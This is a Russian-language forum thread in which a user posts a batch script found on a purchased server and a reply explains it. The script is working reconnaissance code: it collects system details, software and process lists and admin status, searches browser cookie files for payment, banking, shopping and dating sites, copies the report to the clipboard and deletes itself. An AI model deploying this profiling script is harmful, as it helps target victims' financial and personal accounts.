Батник на деде

  • Автор темы Fedmex
  • Дата начала
F

Fedmex

Покупал дед, на нем оказался такой батник, может кто расшифровать?
@echo off

setlocal ENABLEEXTENSIONS
set "paymentlist=cookie_check.paypal.com paypal.comcookie_check account.skrill.com westernunion.com neteller.com entropay.com 2checkout.com wepay.com .v.me gopayment.com dwolla.com aib.ie barclaycardus.com capitalone.com chase.com coinbase.com liqpay.com moneybookers.com open24.ie payeer.com paysurfer.com perfectmoney.com suntrust.com wellsfargo.com"
set "shoplist=sears.com overstock.com ebay.comnonsession dell.com amazon.comsession apple.comdssid beacon.walmart.com bestbuy.comcontext_id newegg.coms_per airbnb.com bhphotovideo.com farfetch.com lowes.com officedepot.com qvc.com steampowered.com target.com"
set "datinglist=match.com mysinglefriend.com friendfinder.com jdate.com gay.com christianconnection.com muddymatches.co.uk zoosk.com shaadi.com datingdirect.com lovearts.com amateurmatch.com cupid.com datehookup.com meetic.com meetme.com"
set "otherlist=accounts.google.com mail.live.com login.yahoo.com att.com sprint.com verizonwireless.com vzw.com verizon.com craiglist.org indeed.com sendspace.com swiftunlocks.com ups.com whoer.net fedex.com"

echo go > %temp%/win_install.log.txt

echo ====start_product==== >> %temp%/win_install.log.txt
REG QUERY "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion" /v ProductName >> %temp%/win_install.log.txt
echo ====end_product==== >> %temp%/win_install.log.txt

echo ====start_cpuname==== >> %temp%/win_install.log.txt
REG QUERY "HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0" /v ProcessorNameString >> %temp%/win_install.log.txt
echo ====end_cpuname==== >> %temp%/win_install.log.txt

echo ====start_cpus==== >> %temp%/win_install.log.txt
echo %NUMBER_OF_PROCESSORS% >> %temp%/win_install.log.txt
echo ====end_cpus==== >> %temp%/win_install.log.txt

echo ====start_domain==== >> %temp%/win_install.log.txt
echo %USERDOMAIN% >> %temp%/win_install.log.txt
echo ====end_domain==== >> %temp%/win_install.log.txt


::get soft list
echo ====start_softlist==== >> %temp%/win_install.log.txt
for /f "skip=4 tokens=*" %%a in ('reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"') do (
::echo %%~na
for /f "tokens=*" %%b in ('REG QUERY "%%a" /v DisplayName 2^>nul') do (
echo %%b>> %temp%/win_install.log.txt
)
)
echo ====end_softlist==== >> %temp%/win_install.log.txt

echo ====start_tasklist==== >> %temp%/win_install.log.txt
tasklist >> %temp%/win_install.log.txt
echo ====end_tasklist==== >> %temp%/win_install.log.txt


echo ====start_admin==== >> %temp%/win_install.log.txt

::check for admin rights
net session >nul 2>&1
if %errorLevel% == 0 (
echo userisadmin >> %temp%/win_install.log.txt
) else (
echo userisnotadmin >> %temp%/win_install.log.txt
)

echo ====end_admin==== >> %temp%/win_install.log.txt

echo ====start_ip==== >> %temp%/win_install.log.txt

::now get IPV4 from ipconfig
ipconfig | find "IPv4" >> %temp%/win_install.log.txt

echo ====end_ip==== >> %temp%/win_install.log.txt

echo ====start_brws==== >> %temp%/win_install.log.txt
IF EXIST "%programfiles(x86)%\Google\Chrome\" (
echo brw_chrome_exist >> %temp%/win_install.log.txt
)
IF EXIST "%programfiles(x86)%\Mozilla Firefox\" (
echo brw_firefox_exist >> %temp%/win_install.log.txt
)
IF EXIST "%programfiles%\Google\Chrome\" (
echo brw_chrome_exist >> %temp%/win_install.log.txt
)
IF EXIST "%programfiles%\Mozilla Firefox\" (
echo brw_firefox_exist >> %temp%/win_install.log.txt
)
echo ====end_brws==== >> %temp%/win_install.log.txt

echo ====start_src==== >> %temp%/win_install.log.txt

::check if ie
IF EXIST %appdata%\Microsoft\Windows\Cookies (
echo browser: ie yes >> %temp%/win_install.log.txt

cd /d %appdata%\Microsoft\Windows\Cookies

for %%i in (%paymentlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
)

::search shops
for %%i in (%shoplist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
)

::search dating
for %%i in (%datinglist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
)

::search others
for %%i in (%otherlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
)

IF EXIST %appdata%\Microsoft\Windows\Cookies\Low (

cd /d %appdata%\Microsoft\Windows\Cookies\Low

for %%i in (%paymentlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
)

::search shops
for %%i in (%shoplist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
)

::search dating
for %%i in (%datinglist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
)

::search others
for %%i in (%otherlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
)

)


)

::check if ie in win 8,8.1,10
IF EXIST %localappdata%\Microsoft\Windows\INetCookies (

cd /d %localappdata%\Microsoft\Windows\INetCookies

for %%i in (%paymentlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
)

::search shops
for %%i in (%shoplist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
)

::search dating
for %%i in (%datinglist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
)

::search others
for %%i in (%otherlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
)


)

::check if firefox installed
IF EXIST %appdata%\Mozilla\Firefox (

cd /d %appdata%\Mozilla\Firefox\Profiles

for /d %%F in (*) do cd /d "%%F"

IF EXIST cookies.sqlite (
::search payments
for %%i in (%paymentlist%) do (
findstr /m %%i cookies.sqlite>nul
if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
)

::search shops
for %%i in (%shoplist%) do (
findstr /m %%i cookies.sqlite>nul
if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
)

::search dating
for %%i in (%datinglist%) do (
findstr /m %%i cookies.sqlite>nul
if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
)

::search others
for %%i in (%otherlist%) do (
findstr /m %%i cookies.sqlite>nul
if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
)
)

)

::check if chrome installed
IF EXIST %localappdata%\Google\Chrome\User Data\Default (

cd /d %localappdata%\Google\Chrome\User Data\Default

IF EXIST Cookies (
::search payments
for %%i in (%paymentlist%) do (
findstr /m %%i Cookies>nul
if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
)

::search shops
for %%i in (%shoplist%) do (
findstr /m %%i Cookies>nul
if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
)

::search dating
for %%i in (%datinglist%) do (
findstr /m %%i Cookies>nul
if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
)

::search others
for %%i in (%otherlist%) do (
findstr /m %%i Cookies>nul
if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
)
)



)

echo ====end_src==== >> %temp%/win_install.log.txt

::notepad %temp%/win_install.log.txt

cd /d %temp%
TYPE win_install.log.txt | clip
del win_install.log.txt


::echo Please press enter to exit and delete file

::pause >nul


DEL "%~f0"
 
L

LamerOnLine

Fedmex сказал(а):
Покупал дед, на нем оказался такой батник, может кто расшифровать?
Нажмите, чтобы раскрыть...
Если удалить нижние строчки
cd /d %temp%
TYPE win_install.log.txt | clip
del win_install.log.txt


::echo Please press enter to exit and delete file

::pause >nul


DEL "%~f0"
Файл создаст отчёт в папке C:\Users\Имя_пользователя\AppData\Local\Temp
В нём будет:
Версия ОС, модель процессора, количество ядер, имя компьютера.
Установленный софт.
Список запущенных процессов.
Проверка пользователя на права администратора.
Все IPv4 адреса.
Установленные браузеры.
Проверка URL адресов из списка в истории этих браузеров.
 
Для ответа нужно войти/зарегистрироваться
Похожие темы
1 Батник для создания скрытых учёток, бэкдоров и т.д. Уязвимости и взлом 0
Admin Интересно Компания F6 планирует выход на фондовый рынок в 2026 году. Новости в сети 0
Admin Интересно Ставите на Polymarket? Ваши финансы в опасности. Новости в сети 0
Admin Интересно Илон Маск представил новый мессенджер XChat с акцентом на приватность. Новости в сети 0
Admin Интересно Подводные лодки станут невидимыми благодаря ядерным часам на тории-229. Новости в сети 0
Admin Интересно Патч вышел утром, атака – в обед. Добро пожаловать в мир, где у вас нет времени на обновления. Новости в сети 0
Admin Интересно Новый фишинговый обман нацелен на пользователей Apple с угрозами удаления данных iCloud. Новости в сети 0
Admin Интересно Тёмная материя где-то рядом: физики опустились на 2 км под землю и охладили установку до края возможного. Новости в сети 0
Admin Интересно Батарейка на ядерном распаде обещает работать 100 лет без замены. Новости в сети 0
Admin Интересно Китайская компания Unitree выводит на рынок доступного робота R1 через AliExpress. Новости в сети 0
Admin Интересно Генетики изучили ДНК на Туринской плащанице, но результаты вызвали больше вопросов, чем ответов. Новости в сети 0
Admin Интересно Экипаж Artemis II успешно вернулся на Землю после лунной миссии. Новости в сети 0
Admin Интересно OpenAI приостанавливает строительство супер дата-центра в Великобритании из-за высоких затрат на электроэнергию. Новости в сети 0
Admin Интересно Два криптографа поспорили на $5000: что сломается первым — старая защита интернета или новая. Новости в сети 0
Admin Интересно Атака вымогателей на ChipSoft нарушила работу электронных медицинских карт в Нидерландах и Бельгии. Новости в сети 0
Admin Интересно Северокорейский хакер случайно раскрыл схему мошенничества на миллионы долларов. Новости в сети 0
Admin Интересно Ubuntu просит 6 ГБ, Windows 11 — 4 ГБ. Что это значит на самом деле — и кто из них честнее с пользователем. Новости в сети 0
Admin Интересно Утечка данных в облаке Еврокомиссии связана с атакой на цепочку поставок Trivy. Новости в сети 0
Admin Интересно Искусственный интеллект может улучшить продажи на платформах вроде Vinted и Depop. Новости в сети 0
Admin Интересно Microsoft раскрыла детали использования cookie для управления PHP-веб-шеллами на Linux-серверах. Новости в сети 0
Admin Интересно Утечка данных Forex вызывает опасения мошенничества и манипуляций на рынке. Новости в сети 0
Admin Интересно Минцифры обсуждает масштабную реформу связи и снятие моратория на проверки операторов. Новости в сети 0
Admin Интересно Социальная инженерия привела к атаке на npm-пакет Axios. Новости в сети 0
Admin Интересно Amazon обязана вести переговоры с профсоюзом работников склада на Статен-Айленде. Новости в сети 0
Admin Интересно Установили бесплатный Photoshop? Добро пожаловать в майнинг-клуб на вашем Mac. Новости в сети 0
Admin Интересно Кибератака на больницу в Техасе привела к утечке данных 257 тысяч пациентов. Новости в сети 0
Admin Интересно Google представила мощную ИИ-модель Gemma 4, которая работает даже на слабом железе. Новости в сети 0
Admin Интересно Полиция действительно может проверить ваш телефон на наличие VPN? Отвечает МВД. Новости в сети 0
Admin Интересно Piter-IX повышает цены на услуги из-за роста затрат и блокировок. Новости в сети 0
Admin Интересно Компания Hasbro сообщила о кибератаке, которая вывела системы из строя на несколько недель. Новости в сети 0
Admin Интересно «Плывущая челюсть» и подозрительные тени. Инструкция для тех, кто не хочет попасться на уловки кибермошенников. Новости в сети 0
Admin Интересно Claw-code на основе утечки Claude Code побил рекорд GitHub. Новости в сети 0
Admin Интересно Кибератака на Cisco началась с плагина для проверки уязвимостей. Новости в сети 0
Admin Интересно UserGate представила стратегию развития до 2030 года и концепцию архитектуры доверия на Open Conf 2026. Новости в сети 0
Admin Интересно Хакер заработал $53 млн на одной опечатке и удивил ФБР своими тратами. Новости в сети 0
Admin Интересно Одна из главных моделей эволюционной биологии держалась на математической ошибке. Новости в сети 0
Admin Интересно Proton Meet представил новый сервис для видеозвонков с акцентом на конфиденциальность. Новости в сети 0
Admin Интересно Как заморозить воду быстрее? Сначала вскипятите её и плюньте на здравый смысл. Новости в сети 0
Admin Интересно В Ростове-на-Дону протестировали режим полной изоляции интернета. Новости в сети 0
Admin Интересно Роботы на Марсе могут стать более автономными для ускорения исследований. Новости в сети 0
Admin Интересно Плагин для Visual Studio Code стал инструментом атаки на разработчиков криптовалют. Новости в сети 0
Admin Интересно Европейская комиссия столкнулась с кибератакой на свою онлайн-платформу. Новости в сети 0
Admin Интересно Axios подвергся атаке на цепочку поставок через скомпрометированный аккаунт npm. Новости в сети 0
Admin Интересно НАСА готовится к запуску первой пилотируемой миссии на Луну за более чем 50 лет. Новости в сети 0
Admin Интересно Минцифры вводит лимиты на международный трафик с 1 мая. Новости в сети 0
Admin Интересно Евродепутаты переходят на одноразовые телефоны для поездок в Китай. Новости в сети 0
Admin Интересно Порт Виго перешёл на бумагу после кибератаки. Новости в сети 0
Admin Интересно Великобритания переводит кирпичный завод на водородное топливо. Новости в сети 0
Admin Интересно Администрация Трампа ограничила давление на соцсети на 10 лет. Новости в сети 0
Admin Интересно Telegram на Android получил новый неофициальный клиент Monogram. Новости в сети 0

Название темы